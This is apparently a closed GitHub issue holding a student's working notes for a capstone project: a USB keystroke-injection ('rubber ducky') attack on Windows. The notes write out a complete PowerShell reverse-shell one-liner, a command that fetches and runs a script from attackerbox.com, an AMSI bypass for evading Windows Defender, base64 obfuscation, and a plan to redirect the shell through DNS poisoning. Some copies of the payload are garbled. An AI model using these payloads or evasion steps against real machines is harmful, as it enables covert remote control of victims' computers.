Closed serate-actual closed 2 years ago
Lv. 0: Netcat/telnet shell
Lv. 1: Web Shell See: https://hacksland.net/build-a-simple-web-shell/
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ Okay, hear me out A netcat shell REQUIRES I know an IP of an attacker box What if I couple this with a DNS poisoning attack. I.e I open netcat to mydomain.net, but mydomain.net is dns poisoned to my attack box. I could easily create the "dumb" netcat script, and then create the SMART netcat script.
okay netcat isn't default on windows help solution 1 - wget/curl/equivalent nc.exe and run it and then delete later solution 2 - Understand what's going on with the powershell thing here Okay, it looks like a blend of solution 1 & solution 2 is what I will use. Currently, the attack path looks like
powershell -exec bypass -f http://attackerbox.com/nc.ps1
Currently setting up a script for kali to set up web server
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 maybe helpful for netcat reverse shell
Okay, I tried that netcat reverse shell. Bravo windows defender, you blocked it. https://github.com/danielbohannon/Invoke-Obfuscation I'm gonna try this tool now
Okay, obfuscation module is broken - However, I demo'd it with windows defender DISABLED
https://pentestlaboratories.com/tag/obfuscation/' Probably going to try base64 encoded just to get it done
This works to bypass the windows defender by bypassing AMSI (basically the utility that scans for malicious code) by setting the amsiinitFailed flag to prevent AMSI from running.
From Fabian Mosch
Okay, so the oneliner for netcat is broken??
IT SHOULD print like this $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
HOWEVER THIS happens
-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = ))\
-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = *b
It kinda dies at the bytes = section. It looks like it's not affected by the syntax. I am going to see how much lorem ipsum that my digispark can print before having an error
Okay, the lorem ipsum test was very . . . enlightening. It compiles and uploads, but DOESN'T do anything with a certain amount of text (like 2-3 lines of lorem ipsum). HOWEVER, it does really well with just printing repeated text (probably something to do with memory) This probably also explains the corruption at the end of it, due to some memory issues.
510 characters = arduino has a bad time 313 characters = happy arduino it's not 255 or 512 . . . HELP WHY DOESNT IT MAKE SENSE
I guess i'll have to curl literally everything and pass directly to powershell, which works.
Time to figure out dns poisoning :)
https://null-byte.wonderhowto.com/how-to/tutorial-dns-spoofing-0167796/
okay here goes the rough idea of my attack
Making a python script
Python script finished - at https://github.com/SirSertile/CNCS-Capstone/tree/main/Design%20Files/Rubber%20Ducky/PythonScript
SSH sessions Web Shells
Maybe display a metasploitable shell? This would be really cool but also a HUGE reach.